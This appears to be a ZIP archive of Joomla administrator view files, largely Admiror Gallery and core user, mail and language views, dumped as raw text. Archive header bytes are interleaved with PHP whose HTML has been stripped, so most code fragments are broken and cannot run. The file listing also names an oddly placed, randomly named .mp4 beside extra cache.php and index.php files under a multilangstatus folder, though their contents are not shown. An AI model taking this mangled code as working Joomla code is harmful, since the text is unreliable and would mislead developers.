    ' . "\n"; $db = JFactory::getDBO(); $query = "SELECT * FROM #__extensions WHERE (element = 'admirorgallery') AND (type = 'plugin')"; $db->setQuery($query); $row = $db->loadAssoc(); //print_r($paramsdata); $paramsdefs = JPATH_SITE . '/administrator/components/com_admirorgallery/config.xml'; //$paramsdefs = JPATH_SITE.'/plugins/content/admirorgallery/admirorgallery.xml'; $myparams = JForm::getInstance('AG_Settings', $paramsdefs); $values = array('params' => json_decode($row['params'])); $myparams->bind($values); $fieldSets = $myparams->getFieldsets(); foreach ($fieldSets as $name => $fieldSet) : $label = !empty($fieldSet->label) ? $fieldSet->label : 'COM_PLUGINS_' . $name . '_FIELDSET_LABEL'; //echo JHtml::_('sliders.panel', JText::_($label), $name.'-options'); if (isset($fieldSet->description) && trim($fieldSet->description)) : //echo '

    '.$this->escape(JText::_($fieldSet->description)).'

    '; endif; ?>
      getFieldset($name) as $field) : ?> hidden) : ?>
    • label; ?> input; ?>
    • input; ?>

    '; if (JFIle::exists(JPATH_COMPONENT_ADMINISTRATOR . '/com_admirorgallery.xml')) { $ag_admirorgallery_xml = JFactory::getXMLParser('simple'); $ag_admirorgallery_xml->loadFile(JPATH_COMPONENT_ADMINISTRATOR . '/com_admirorgallery.xml'); $ag_admirorgallery_version_component = $ag_admirorgallery_xml->document->version[0]->data(); $ag_admirorgallery_version_plugin = $ag_admirorgallery_xml->document->plugin_version[0]->data(); $ag_admirorgallery_version_button = $ag_admirorgallery_xml->document->button_version[0]->data(); echo JText::_('AG_COMPONENT_VERSION') . ' ' . $ag_admirorgallery_version_component . "
    "; echo JText::_('AG_PLUGIN_VERSION') . ' ' . $ag_admirorgallery_version_plugin . "
    "; echo JText::_('AG_BUTTON_VERSION') . ' ' . $ag_admirorgallery_version_button . "
    "; } echo '
    ' . "\n"; echo JText::_('AG_ADMIRORGALLERY_DESCRIPTION'); echo '
    '; ?> PKB\)admirorgallery/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKB\#o,,admirorgallery/index.htmlnuW+APKB\#o,,resourcemanager/index.htmlnuW+APKB\)resourcemanager/.htaccessnuW+A Order allow,deny Deny from all PKB\66resourcemanager/view.html.phpnuW+AgetUserStateFromRequest( $option.'.limitstart', 'limitstart', 0, 'int' ); $limit = $mainframe->getUserStateFromRequest( 'global.list.limit', 'limit', $mainframe->getCfg('list_limit'), 'int' ); ?>
    AG_jQuery(function(){ AG_jQuery(".ag_title_link").click(function(e) { e.preventDefault(); if(AG_jQuery(this).closest("tr").find(\'input:checkbox\').attr("checked") == true){ AG_jQuery(this).closest("tr").find(\'input:checkbox\').attr("checked", false); }else{ AG_jQuery(this).closest("tr").find(\'input:checkbox\').attr("checked", true); } }); AG_jQuery("#checkAll").click(function(e) { var numOfRows = AG_jQuery(".adminlist tbody tr").length; if(AG_jQuery(this).attr("checked") == true){ for(i='.$limitstart.';i<('.$limitstart.'+numOfRows);i++){ AG_jQuery("#cb"+i).attr("checked", true); } }else{ for(i='.$limitstart.';i<('.$limitstart.'+numOfRows);i++){ AG_jQuery("#cb"+i).attr("checked", false); } } }); });//AG_jQuery '."\n"; // Read folder with gallery templates $ag_resourceManager_installed = JFolder::folders(JPATH_SITE.'/plugins/content/admirorgallery/admirorgallery/'.$AG_resourceType);// N U sort($ag_resourceManager_installed); // Rendering the form and table grid echo '
    '.JText::_('AG_SELECT_TEMPLATE_TO_INSTALL').' [ '.JText::_( 'AG_MAX' ).' '.(JComponentHelper::getParams('com_media')->get('upload_maxsize',0)).' MB ]: 

    '; echo ' '; $total = count($ag_resourceManager_installed); $pageNav = new JPagination( $total, $limitstart, $limit ); if($limit=="all"){$limit=$total;} if(!empty($ag_resourceManager_installed)){ foreach ($ag_resourceManager_installed as $ag_resourceManager_Key => $ag_resourceManager_Value) { if($ag_resourceManager_Key >= $limitstart && $ag_resourceManager_Key < ($limitstart+$limit)){ // TEMPLATE DETAILS PARSING $ag_resourceManager_id = $ag_resourceManager_Value; $ag_resourceManager_name = $ag_resourceManager_id; $ag_resourceManager_creationDate = JText::_( "AG_UNDATED"); $ag_resourceManager_author = JText::_( "AG_UNKNOWN_AUTHOR"); $ag_resourceManager_version = JText::_( "AG_UNKNOWN_VERSION"); $ag_resourceManager_description = JText::_( "AG_NO_DESCRITION"); if(JFIle::exists(JPATH_SITE.'/plugins/content/admirorgallery/admirorgallery/'.$AG_resourceType.'/'.$ag_resourceManager_id.'/details.xml')){// N U $ag_resourceManager_xml =JFactory::getXMLParser( 'simple' ); $ag_resourceManager_xml->loadFile( JPATH_SITE.'/plugins/content/admirorgallery/admirorgallery/'.$AG_resourceType.'/'.$ag_resourceManager_id.'/details.xml' );// N U $ag_resourceManager_name = $ag_resourceManager_xml->document->name[0]->data(); $ag_resourceManager_creationDate = $ag_resourceManager_xml->document->creationDate[0]->data(); $ag_resourceManager_author = $ag_resourceManager_xml->document->author[0]->data(); $ag_resourceManager_version = $ag_resourceManager_xml->document->version[0]->data(); $ag_resourceManager_description = $ag_resourceManager_xml->document->description[0]->data(); } echo ' '; } }//foreach ($ag_resourceManager_installed as $ag_resourceManager_Key => $ag_resourceManager_Value) }//if(!empty($ag_resourceManager_installed)) echo '
    #
    '.JText::_( "AG_TITLE").' '.JText::_( "AG_ID").' '.JText::_( "AG_DESCRIPTION").' '.JText::_( "AG_VERSION").' '.JText::_( "AG_DATE").' '.JText::_( "AG_AUTHOR").'
    '.($ag_resourceManager_Key+1).'. '; //if ($row->checked_out && $row->checked_out != $user->id) { //echo ' '; //} else { echo ' '; //} echo ' '.$ag_resourceManager_name.' '.$ag_resourceManager_id.' '.$ag_resourceManager_description.' '.$ag_resourceManager_version.' '.$ag_resourceManager_creationDate.' '.$ag_resourceManager_author.'
    '.$pageNav->getListFooter().'
    '; ?> PKB\#o,,resourcemanager/tmpl/index.htmlnuW+APKB\)resourcemanager/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKB\)galleryname/.htaccessnuW+A Order allow,deny Deny from all PKB\#o,,galleryname/index.htmlnuW+APKB\7nngalleryname/view.html.phpnuW+A Order allow,deny Deny from all PKB\#o,,galleryname/tmpl/index.htmlnuW+APKB\ÛM galleryname/tmpl/default.phpnuW+Aparams); $ag_rootFolder = $pluginParams->get('rootFolder', '/images/sampledata/'); $ag_init_itemURL = $ag_rootFolder; ?>


    $ag_folders_value) { $ag_folderName = substr($ag_folders_value['relname'], $ag_init_itemURL_strlen); echo ' ' . $ag_folderName . '
    '; } } ?>

    PKB\)imagemanager/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKB\#o,,imagemanager/tmpl/index.htmlnuW+APKB\.e%%imagemanager/tmpl/default.phpnuW+Aparams); $ag_rootFolder = $pluginParams->get('rootFolder','/images/sampledata/'); if($AG_frontEnd=='true'){ $ag_starting_folder = $pluginParams->get('rootFolder','/images/sampledata/').$this->galleryName.'/'; }else{ $ag_starting_folder = $ag_rootFolder; } if(!empty($AG_itemURL)){ $ag_init_itemURL = $AG_itemURL; }else{ if($AG_frontEnd=='true'){ $ag_init_itemURL = $pluginParams->get('rootFolder','/images/sampledata/').$this->galleryName.'/'; }else{ $ag_init_itemURL = $ag_rootFolder; } } ?>
    '.$ag_init_itemURL); $ag_preview_content='
    '.$ag_init_itemURL.'
    '; return; } echo ' '."\n"; // FORMAT FORM if($AG_frontEnd=='true'){ require_once( JPATH_COMPONENT.DS.'helpers'.DS.'toolbar.php' ); echo '
    '.AdmirorgalleryHelperToolbar::getToolbar().'
    '; } echo '
    '."\n"; // FORMAT SCREEN echo '
    '.JText::_( 'AG_SHOW_SIDEBAR').' '.$ag_preview_content.'
    '."\n"; ?>
    PKB\)imagemanager/.htaccessnuW+A Order allow,deny Deny from all PKB\imagemanager/view.html.phpnuW+A'.substr($ag_rootFolder,0,-1).'/'; $ag_breadcrumb_link.=$ag_rootFolder; $ag_breadcrumb_cut=substr($ag_folderName,strlen($ag_rootFolder)); $ag_breadcrumb_cut_array=explode("/",$ag_breadcrumb_cut); if(!empty($ag_breadcrumb_cut_array[0])){ foreach($ag_breadcrumb_cut_array as $cut_key => $cut_value){ $ag_breadcrumb_link.=$cut_value.'/'; $ag_breadcrumb.=''.$cut_value.'/'; } } $ag_breadcrumb.=$ag_fileName; }else{ $ag_breadcrumb.=$ag_rootFolder; } return $ag_breadcrumb; } } PKB\)imagemanager/scripts/.htaccessnuW+A Order allow,deny Deny from all PKB\JyFF1imagemanager/scripts/imgManager-render-folder.phpnuW+AenqueueMessage(JText::_("AG_CANNOT_CREATE_FOLDER") . " " . $newFolderName, 'error'); } function ag_render_caption($ag_lang_name, $ag_lang_tag, $ag_lang_content) { return '
    ' . $ag_lang_name . ' / ' . $ag_lang_tag . '
    '; } $ag_preview_content = ''; $ag_preview_content.='
    ' . "\n"; $ag_preview_content.='

    ' . JText::_('AG_CURRENT_FOLDER') . '

    ' . $this->_renderBreadcrumb($ag_itemURL, $ag_starting_folder, $ag_folderName, $ag_fileName) . '

    ' . JText::_('AG_OPERATION_WITH_SELECTED_ITEMS') . '

     ' . JText::_('AG_UPLOAD_IMAGES_JPG_JPEG_GIF_PNG_OR_ZIP') . ' [ ' . JText::_('AG_MAX') . ' ' . (JComponentHelper::getParams('com_media')->get('upload_maxsize',0)).' MB ]: 

     ' . JText::_('AG_CREATE_FOLDERS') . '  ' . JText::_('AG_ADD') . '

    ' . JText::_('AG_EDIT_FOLDER_CAPTIONS') . '
    '; // RENDER FOLDERS // CREATED SORTED ARRAY OF FOLDERS $ag_files = JFolder::folders(JPATH_SITE . $ag_itemURL); if (!empty($ag_files)) { $ag_folders_priority = Array(); $ag_folders_noPriority = Array(); $ag_folders = Array(); foreach ($ag_files as $key => $value) { $ag_folderName = $ag_itemURL; $ag_fileName = basename($value); // Set Possible Description File Apsolute Path // Instant patch for upper and lower case... $ag_pathWithStripExt = JPATH_SITE . $ag_folderName . JFile::stripExt($ag_fileName); $ag_XML_path = $ag_pathWithStripExt . ".XML"; if (JFIle::exists($ag_pathWithStripExt . ".xml")) { $ag_XML_path = $ag_pathWithStripExt . ".xml"; } if (file_exists($ag_XML_path)) { $ag_XML_xml = JFactory::getXMLParser('simple'); $ag_XML_xml->loadFile($ag_XML_path); $ag_XML_priority = $ag_XML_xml->document->priority[0]->data(); } if (!empty($ag_XML_priority) && file_exists($ag_XML_path)) { $ag_folders_priority[$value] = $ag_XML_priority; // PRIORITIES IMAGES } else { $ag_folders_noPriority[] = $value; // NON PRIORITIES IMAGES } } } if (!empty($ag_folders_priority)) { asort($ag_folders_priority); foreach ($ag_folders_priority as $key => $value) { $ag_folders[] = $key; } } if (!empty($ag_folders_noPriority)) { natcasesort($ag_folders_noPriority); foreach ($ag_folders_noPriority as $key => $value) { $ag_folders[] = $value; } } if (!empty($ag_folders)) { foreach ($ag_folders as $key => $value) { $ag_hasXML = ""; $ag_hasThumb = ""; // Set Possible Description File Apsolute Path // Instant patch for upper and lower case... $ag_pathWithStripExt = JPATH_SITE . $ag_itemURL . JFile::stripExt(basename($value)); $ag_XML_path = $ag_pathWithStripExt . ".xml"; if (JFIle::exists($ag_pathWithStripExt . ".XML")) { $ag_XML_path = $ag_pathWithStripExt . ".XML"; } $ag_XML_visible = "AG_VISIBLE"; $ag_XML_priority = ""; if (file_exists($ag_XML_path)) { $ag_hasXML = ''; $ag_XML_xml = JFactory::getXMLParser('simple'); $ag_XML_xml = simplexml_load_file($ag_XML_path); if (isset($ag_XML_xml->priority)) { $ag_XML_priority = $ag_XML_xml->priority; } if (isset($ag_XML_xml->visible)) { if ((string) $ag_XML_xml->visible == "false") { $ag_XML_visible = "AG_HIDDEN"; } } } $ag_preview_content.='

    ' . JText::_($ag_XML_visible) . '

    ' . JText::_('AG_PRIORITY') . ': 
    '; } } // RENDER IMAGES // CREATED SORTED ARRAY OF IMAGES $ag_files = JFolder::files(JPATH_SITE . $ag_itemURL); $ag_ext_valid = array("jpg", "jpeg", "gif", "png"); // SET VALID IMAGE EXTENSION if (!empty($ag_files)) { $ag_images_priority = Array(); $ag_images_noPriority = Array(); $ag_images = Array(); foreach ($ag_files as $key => $value) { if (is_numeric(array_search(strtolower(JFile::getExt(basename($value))), $ag_ext_valid))) { $ag_folderName = $ag_itemURL; $ag_fileName = basename($value); // Set Possible Description File Apsolute Path // Instant patch for upper and lower case... $ag_pathWithStripExt = JPATH_SITE . $ag_folderName . JFile::stripExt($ag_fileName); $ag_XML_path = $ag_pathWithStripExt . ".XML"; if (JFIle::exists($ag_pathWithStripExt . ".xml")) { $ag_XML_path = $ag_pathWithStripExt . ".xml"; } if (file_exists($ag_XML_path)) { $ag_XML_xml = JFactory::getXMLParser('simple'); $ag_XML_xml->loadFile($ag_XML_path); $ag_XML_priority = $ag_XML_xml->document->priority[0]->data(); } if (!empty($ag_XML_priority) && file_exists($ag_XML_path)) { $ag_images_priority[$value] = $ag_XML_priority; // PRIORITIES IMAGES } else { $ag_images_noPriority[] = $value; // NON PRIORITIES IMAGES } } } } if (!empty($ag_images_priority)) { asort($ag_images_priority); foreach ($ag_images_priority as $key => $value) { $ag_images[] = $key; } } if (!empty($ag_images_noPriority)) { natcasesort($ag_images_noPriority); foreach ($ag_images_noPriority as $key => $value) { $ag_images[] = $value; } } if (!empty($ag_images)) { foreach ($ag_images as $key => $value) { $ag_hasXML = ""; $ag_hasThumb = ""; // Set Possible Description File Apsolute Path // Instant patch for upper and lower case... $ag_pathWithStripExt = JPATH_SITE . $ag_itemURL . JFile::stripExt(basename($value)); $ag_XML_path = $ag_pathWithStripExt . ".xml"; if (JFIle::exists($ag_pathWithStripExt . ".XML")) { $ag_XML_path = $ag_pathWithStripExt . ".XML"; } $ag_XML_visible = "AG_VISIBLE"; $ag_XML_priority = ""; if (file_exists($ag_XML_path)) { $ag_hasXML = ''; $ag_XML_xml = JFactory::getXMLParser('simple'); $ag_XML_xml = simplexml_load_file($ag_XML_path); if (isset($ag_XML_xml->priority)) { $ag_XML_priority = $ag_XML_xml->priority; } if (isset($ag_XML_xml->visible)) { if ((string) $ag_XML_xml->visible == "false") { $ag_XML_visible = "AG_HIDDEN"; } } } if (file_exists(JPATH_SITE . "/plugins/content/admirorgallery/admirorgallery/thumbs/" . basename($ag_folderName) . "/" . basename($value))) { $ag_hasThumb = ''; } agHelper::ag_createThumb(JPATH_SITE . $ag_itemURL . $value, $thumbsFolderPhysicalPath . DS . $value, 145, 80, "none"); $AG_thumb_checked = ""; if ($ag_XML_thumb == $value) { $AG_thumb_checked = " CHECKED"; } $ag_preview_content.='

    ' . JText::_($ag_XML_visible) . '

    ' . JText::_('AG_PRIORITY') . ': 
     ' . JText::_('AG_FOLDER_THUMB') . '
    '; } } if (empty($ag_folders) && empty($ag_images)) { $ag_preview_content.= JText::_('AG_NO_FOLDERS_OR_IMAGES_FOUND_IN_CURRENT_FOLDER'); } $AG_folderDroplist = ""; $ag_preview_content.=' '; ?> PKB\Ɓ/imagemanager/scripts/imgManager-render-file.phpnuW+AenqueueMessage( JText::_( "AG_CANNOT_CREATE_FOLDER" )." ".$newFolderName, 'error' ); } $ag_hasXML=""; $ag_hasThumb=""; // Set Possible Description File Apsolute Path // Instant patch for upper and lower case... $ag_pathWithStripExt=JPATH_SITE.$ag_folderName.'/'.JFile::stripExt(basename($ag_itemURL)); $ag_imgXML_path=$ag_pathWithStripExt.".XML"; if(JFIle::exists($ag_pathWithStripExt.".xml")){ $ag_imgXML_path=$ag_pathWithStripExt.".xml"; } if(file_exists(JPATH_SITE."/plugins/content/admirorgallery/admirorgallery/thumbs/".basename($ag_folderName)."/".basename($ag_fileName))){ $ag_hasThumb=''; } if(file_exists($ag_imgXML_path)){ $ag_hasXML=''; $ag_imgXML_xml = JFactory::getXMLParser( 'simple' ); $ag_imgXML_xml->loadFile($ag_imgXML_path); $ag_imgXML_captions = $ag_imgXML_xml->document->captions[0]; } $ag_preview_content=''; // GET IMAGES FOR NEXT AND PREV IMAGES FUNCTIONS $ag_files=JFolder::files(JPATH_SITE.$ag_folderName); if(!empty($ag_files)){ $ag_ext_valid = array ("jpg","jpeg","gif","png");// SET VALID IMAGE EXTENSION $ag_images=Array(); foreach($ag_files as $key => $value){ if(is_numeric(array_search(strtolower(JFile::getExt(basename($value))),$ag_ext_valid))){ $ag_images[]=$value; } } if(array_search($ag_fileName, $ag_images)!=0){ $ag_fileName_prev=$ag_images[array_search($ag_fileName, $ag_images)-1]; } if(array_search($ag_fileName, $ag_images)'.JText::_( "AG_PREVIOUS_IMAGE").''."\n"; } if(!empty($ag_fileName_next)){ $ag_preview_content.=''.JText::_( "AG_NEXT_IMAGE").''."\n"; } } $ag_preview_content.='
    '; $ag_preview_content.='

    '.JText::_( 'AG_IMAGE_DETAILS_FOR_FILE' ).'

    '.$this->_renderBreadcrumb($ag_itemURL, $ag_starting_folder, $ag_folderName, $ag_fileName).'
    '; agHelper::ag_createThumb(JPATH_SITE.$ag_itemURL, $thumbsFolderPhysicalPath.DS.basename($ag_itemURL), 145, 80, "none"); $ag_preview_content.='
    '.$ag_itemURL.'
    '.JText::_( "AG_IMG_WIDTH").': '.$AG_imgInfo["width"].'px
    '.JText::_( "AG_IMG_HEIGHT").': '.$AG_imgInfo["height"].'px
    '.JText::_( "AG_IMG_TYPE").': '.$AG_imgInfo["type"].'
    '.JText::_( "AG_IMG_SIZE").': '.$AG_imgInfo["size"].'
    '.$ag_hasXML.$ag_hasThumb.'
    '; require_once (JPATH_ROOT.DS.'administrator'.DS.'components'.DS.'com_admirorgallery'.DS.'slimbox'.DS.'index.php'); function ag_render_caption($ag_lang_name, $ag_lang_tag, $ag_lang_content){ return '
    '.$ag_lang_name.' / '.$ag_lang_tag.'
    '; } $ag_matchCheck = Array("default"); // GET DEFAULT LABEL $ag_imgXML_caption_content=""; if(!empty($ag_imgXML_captions->caption)){ foreach($ag_imgXML_captions->caption as $ag_imgXML_caption){ if(strtolower($ag_imgXML_caption->attributes('lang')) == "default"){ $ag_imgXML_caption_content = $ag_imgXML_caption->data(); } } } $ag_preview_content.= ag_render_caption("Default", "default", $ag_imgXML_caption_content); // GET LABELS ON SITE LANGUAGES $ag_lang_available = JLanguage::getKnownLanguages(JPATH_SITE); if(!empty($ag_lang_available)){ foreach($ag_lang_available as $ag_lang){ $ag_imgXML_caption_content=""; if(!empty($ag_imgXML_captions->caption)){ foreach($ag_imgXML_captions->caption as $ag_imgXML_caption){ if(strtolower($ag_imgXML_caption->attributes('lang')) == strtolower($ag_lang["tag"])){ $ag_imgXML_caption_content = $ag_imgXML_caption->data(); $ag_matchCheck[]=strtolower($ag_lang["tag"]); } } } $ag_preview_content.= ag_render_caption($ag_lang["name"], $ag_lang["tag"], $ag_imgXML_caption_content); } } if(!empty($ag_imgXML_captions->caption)){ foreach($ag_imgXML_captions->caption as $ag_imgXML_caption){ $ag_imgXML_caption_attr = $ag_imgXML_caption->attributes('lang'); if(!is_numeric(array_search(strtolower($ag_imgXML_caption_attr),$ag_matchCheck))){ $ag_preview_content.= ag_render_caption($ag_imgXML_caption_attr, $ag_imgXML_caption_attr, $ag_imgXML_caption->data()); } } } $ag_preview_content.='

    '.JText::_( 'AG_LEGEND' ).'

    '.JText::_( 'AG_IMAGE_HAS_THUMBNAIL_CREATED' ).'
    '.JText::_( 'AG_IMAGE_HAS_ADDITIONAL_DETAILS_SAVED' ).'
    '; ?> PKB\#o,,imagemanager/index.htmlnuW+APKB\#o,,button/index.htmlnuW+APKB\գ..button/tmpl/default.xmlnuW+A
    PKB\D"button/tmpl/default.phpnuW+Aparams); $ag_rootFolder = $pluginParams->get('rootFolder', '/images/sampledata/'); $ag_init_itemURL = $ag_rootFolder; ?>


     


    PKB\#o,,button/tmpl/index.htmlnuW+APKB\)button/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKB\hsiibutton/view.html.phpnuW+A Order allow,deny Deny from all PKÌB\Vcpanel/index.htmlnuW+A PKÌB\)cpanel/.htaccessnuW+A Order allow,deny Deny from all PKÌB\Vcpanel/tmpl/index.htmlnuW+A PKÌB\)cpanel/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKÌB\"Wzcpanel/tmpl/default.phpnuW+A '1')); foreach ($this->modules as $module) { $output = JModuleHelper::renderModule($module); $params = new JRegistry; $params->loadString($module->params); if ($params->get('automatic_title', '0')=='0') { echo JHtml::_('sliders.panel', $module->title, 'cpanel-panel-'.$module->name); } elseif (method_exists('mod'.$module->name.'Helper', 'getTitle')) { echo JHtml::_('sliders.panel', call_user_func_array(array('mod'.$module->name.'Helper', 'getTitle'), array($params)), 'cpanel-panel-'.$module->name); } else { echo JHtml::_('sliders.panel', JText::_('MOD_'.$module->name.'_TITLE'), 'cpanel-panel-'.$module->name); } echo $output; } echo JHtml::_('sliders.end'); PKÌB\j?\cpanel/view.html.phpnuW+Amodules = JModuleHelper::getModules('cpanel'); parent::display($tpl); } } PKB\Vsent/tmpl/index.htmlnuW+A PKB\SSsent/tmpl/default.phpnuW+A PKB\)sent/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKB\)sent/.htaccessnuW+A Order allow,deny Deny from all PKB\.bkksent/view.html.phpnuW+A Mailto Andrew Eddie 13 Mar 2006 Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved. GNU General Public License version 2 or later; see LICENSE.txt admin@joomla.org www.joomla.org COM_MAILTO_XML_DESCRIPTION PKB\Vsent/index.htmlnuW+A PKB\  mailto/view.html.phpnuW+AgetData(); if ($data === false) { return false; } $this->set('data' , $data); parent::display($tpl); } function &getData() { $user = JFactory::getUser(); $data = new stdClass(); $data->link = urldecode(JRequest::getVar('link', '', 'method', 'base64')); if ($data->link == '') { JError::raiseError(403, JText::_('COM_MAILTO_LINK_IS_MISSING')); $false = false; return $false; } // Load with previous data, if it exists $mailto = JRequest::getString('mailto', '', 'post'); $sender = JRequest::getString('sender', '', 'post'); $from = JRequest::getString('from', '', 'post'); $subject = JRequest::getString('subject', '', 'post'); if ($user->get('id') > 0) { $data->sender = $user->get('name'); $data->from = $user->get('email'); } else { $data->sender = $sender; $data->from = $from; } $data->subject = $subject; $data->mailto = $mailto; return $data; } } PKB\Vmailto/index.htmlnuW+A PKB\##mailto/metadata.xmlnuW+A PKB\)mailto/.htaccessnuW+A Order allow,deny Deny from all PKB\)mailto/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKB\Vmailto/tmpl/index.htmlnuW+A PKB\Ig mailto/tmpl/default.phpnuW+A get('data'); ?> PKΛA\)mail/.htaccessnuW+APKΛA\!Qmail/view.html.phpnuW+APKΛA\*RS  mail/tmpl/default.phpnuW+APKΛA\)mail/tmpl/.htaccessnuW+APKΛA\Vmail/tmpl/index.htmlnuW+APKΛA\Vmail/index.htmlnuW+APKΛA\)plevels/.htaccessnuW+APKΛA\=v/levels/view.html.phpnuW+APKΛA\Vnlevels/index.htmlnuW+APKΛA\ levels/tmpl/default.phpnuW+APKΛA\V,levels/tmpl/index.htmlnuW+APKΛA\)-levels/tmpl/.htaccessnuW+APKΛA\)-note/.htaccessnuW+APKΛA\6.note/index.htmlnuW+APKΛA\).note/tmpl/.htaccessnuW+APKΛA\sx/note/tmpl/edit.phpnuW+APKΛA\67note/tmpl/index.htmlnuW+APKΛA\ 7note/view.html.phpnuW+APKΛA\)Clevel/.htaccessnuW+APKΛA\ Clevel/tmpl/edit.phpnuW+APKΛA\)Plevel/tmpl/.htaccessnuW+APKΛA\VQlevel/tmpl/index.htmlnuW+APKΛA\q: Rlevel/view.html.phpnuW+APKΛA\V_Ylevel/index.htmlnuW+APKΛA\) Y.htaccessnuW+APKΛA\VvZdebuggroup/index.htmlnuW+APKΛA\)Zdebuggroup/.htaccessnuW+APKΛA\)[debuggroup/tmpl/.htaccessnuW+APKΛA\e\debuggroup/tmpl/default.phpnuW+APKΛA\Vqdebuggroup/tmpl/index.htmlnuW+APKΛA\*rVBrdebuggroup/view.html.phpnuW+APKΛA\VVxgroups/tmpl/index.htmlnuW+APKΛA\)xgroups/tmpl/.htaccessnuW+APKΛA\Ymygroups/tmpl/default.phpnuW+APKΛA\)Pgroups/.htaccessnuW+APKΛA\Vgroups/index.htmlnuW+APKΛA\3ogroups/view.html.phpnuW+APKΛA\Vgroup/tmpl/index.htmlnuW+APKΛA\tgroup/tmpl/edit.phpnuW+APKΛA\)>group/tmpl/.htaccessnuW+APKΛA\)group/.htaccessnuW+APKΛA\ δgroup/view.html.phpnuW+APKΛA\Vgroup/index.htmlnuW+APKΛA\cedebuguser/view.html.phpnuW+APKΛA\Vdebuguser/tmpl/index.htmlnuW+APKΛA\Edebuguser/tmpl/default.phpnuW+APKΛA\)Idebuguser/tmpl/.htaccessnuW+APKΛA\)debuguser/.htaccessnuW+APKΛA\Vҿdebuguser/index.htmlnuW+APKΛA\@jx5users/view.html.phpnuW+APKΛA\)-users/.htaccessnuW+APKΛA\Vusers/index.htmlnuW+APKΛA\VJusers/tmpl/index.htmlnuW+APKΛA\)users/tmpl/.htaccessnuW+APKΛA\YD1qusers/tmpl/default.phpnuW+APKΛA\0h users/tmpl/modal.phpnuW+APKΛA\xIusers/tmpl/default_batch.phpnuW+APKΛA\3~user/view.html.phpnuW+APKΛA\Vuser/index.htmlnuW+APKΛA\Vnuser/tmpl/index.htmlnuW+APKΛA\FJ50r r user/tmpl/edit.phpnuW+APKΛA\FKuser/tmpl/edit_groups.phpnuW+APKΛA\)user/tmpl/.htaccessnuW+APKΛA\)Muser/.htaccessnuW+APKΛA\V  index.htmlnuW+APKΛA\C,cnotes/tmpl/default.phpnuW+APKΛA\64*notes/tmpl/index.htmlnuW+APKΛA\V-*notes/tmpl/modal.phpnuW+APKΛA\)`1notes/tmpl/.htaccessnuW+APKΛA\6#2notes/index.htmlnuW+APKΛA\)2notes/.htaccessnuW+APKΛA\c ?3notes/view.html.phpnuW+APKͼA\A?form/index.htmlnuW+APKͼA\)?form/.htaccessnuW+APKͼA\w~=@form/metadata.xmlnuW+APKͼA\W|Aform/tmpl/default.xmlnuW+APKͼA\)KDform/tmpl/.htaccessnuW+APKͼA\ Eform/tmpl/index.htmlnuW+APKB\6QEoverrides/index.htmlnuW+APKB\)Eoverrides/tmpl/.htaccessnuW+APKB\\̌zFoverrides/tmpl/default.phpnuW+APKB\6LVoverrides/tmpl/index.htmlnuW+APKB\)Voverrides/.htaccessnuW+APKB\j55uWoverrides/view.html.phpnuW+APKB\$Y _override/view.html.phpnuW+APKB\)koverride/tmpl/.htaccessnuW+APKB\“koverride/tmpl/edit.phpnuW+APKB\Vzoverride/tmpl/index.htmlnuW+APKB\V{override/index.htmlnuW+APKB\)p{override/.htaccessnuW+APKB\V1|installed/index.htmlnuW+APKB\)|installed/.htaccessnuW+APKB\%V}installed/tmpl/default_navigation.phpnuW+APKB\Vinstalled/tmpl/index.htmlnuW+APKB\)installed/tmpl/.htaccessnuW+APKB\F/  installed/tmpl/default.phpnuW+APKB\h>installed/tmpl/default_ftp.phpnuW+APKB\%`Քinstalled/view.html.phpnuW+APKB\5xxx3multilangstatus/multilangstatus/tlinmFgcpHUjZzQ.mp4nuW+APKB\ĻX  )multilangstatus/multilangstatus/cache.phpnuW+APKB\gm )multilangstatus/multilangstatus/index.phpnuW+APKB\,r)5multilangstatus/multilangstatus/.htaccessnuW+APKB\yimultilangstatus/view.html.phpnuW+APKB\Vmultilangstatus/index.htmlnuW+APKB\)/multilangstatus/.htaccessnuW+APKB\)multilangstatus/tmpl/.htaccessnuW+APKB\'(JJ multilangstatus/tmpl/default.phpnuW+APKB\V^multilangstatus/tmpl/index.htmlnuW+APKB\)languages/.htaccessnuW+APKB\wwlanguages/tmpl/default.phpnuW+APKB\)Olanguages/tmpl/.htaccessnuW+APKB\Vlanguages/tmpl/index.htmlnuW+APKB\$A  ~languages/view.html.phpnuW+APKB\V%languages/index.htmlnuW+APKB\)B&language/.htaccessnuW+APKB\ыsa 'language/tmpl/edit.phpnuW+APKB\V4language/tmpl/index.htmlnuW+APKB\):5language/tmpl/.htaccessnuW+APKB\V6language/index.htmlnuW+APKB\>b6language/view.html.phpnuW+APK=B\)b>contact/.htaccessnuW+APK=B\ "?contact/view.html.phpnuW+APK=B\@"ۨ  Icontact/tmpl/edit.phpnuW+APK=B\zzVbcontact/tmpl/edit_params.phpnuW+APK=B\a >>fcontact/tmpl/edit_metadata.phpnuW+APK=B\)kcontact/tmpl/.htaccessnuW+APK=B\Vmlcontact/tmpl/index.htmlnuW+APK=B\Vlcontact/index.htmlnuW+APK=B\V4mcontacts/tmpl/index.htmlnuW+APK=B\)mcontacts/tmpl/.htaccessnuW+APK=B\1m""ancontacts/tmpl/default.phpnuW+APK=B\Υ~~contacts/tmpl/modal.phpnuW+APK=B\7tmm^contacts/tmpl/default_batch.phpnuW+APK=B\Vcontacts/index.htmlnuW+APK=B\f)> > |contacts/view.html.phpnuW+APK=B\)contacts/.htaccessnuW+APKmB\)cache/.htaccessnuW+APKmB\_xml/tmpl/default_items.phpnuW+APKB\㱊kkxml/tmpl/default.phpnuW+APKB\kxml/view.html.phpnuW+APKB\E ʵrxml/metadata.xmlnuW+APKB\) gxml/.htaccessnuW+APKAB\V#profile/index.htmlnuW+APKAB\)profile/.htaccessnuW+APKAB\JnDprofile/view.html.phpnuW+APKAB\,vvprofile/tmpl/edit.phpnuW+APKAB\)\profile/tmpl/.htaccessnuW+APKAB\V!profile/tmpl/index.htmlnuW+APKAB\ 